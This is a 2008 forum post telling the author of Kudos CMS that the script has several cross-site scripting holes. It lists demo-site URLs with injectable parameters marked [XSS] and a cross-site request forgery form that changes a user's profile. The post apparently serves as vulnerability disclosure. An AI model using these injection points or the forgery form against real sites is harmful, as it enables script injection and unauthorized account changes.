Thread: Kudos CMS
View Single Post
Old 04-12-2008, 04:28 PM   #15 (permalink)
autehonker
The Wanderer
 
autehonker's Avatar
 
Join Date: Feb 2008
Posts: 8
Thanks: 9
autehonker is on a distinguished road
Default
Heya man ur scripts have Multiple Cross-Site Scripting Vulnerabilities
PHP Code:
------------------- XSS ---------------------
http://www.evanbot.com/kudos/demo/?page=edit_profile_photo&id=[XSS]
http://www.evanbot.com/kudos/demo/?page=search&keywords=[XSS]
http://www.evanbot.com/kudos/demo/?page=edit_profile&id=username[XSRF]
http://www.evanbot.com/kudos/demo/?page=user&id=[XSS]
http://www.evanbot.com/kudos/demo/?page=album&id=[XSS]
http://www.evanbot.com/kudos/demo/?page=post_wall&id=[XSS]
------------------- XSRF ---------------------
<form method='post' action='scripts.php?page=edit_profile&id=username'>
<textarea cols='65' rows='17' name='profile'>[XSRF]</textarea></p>
<input name='email' value='mail@site.com' /></p>
<input type='submit' value='Save' /></form
The disclosure of these issues has been credited to autehonker of the / Depo2 BugTracker/ReverseEnginnering/Cryptology Development Center | Depo2.Nm.Ru |

Enjoy!
autehonker is offline   		Reply With Quote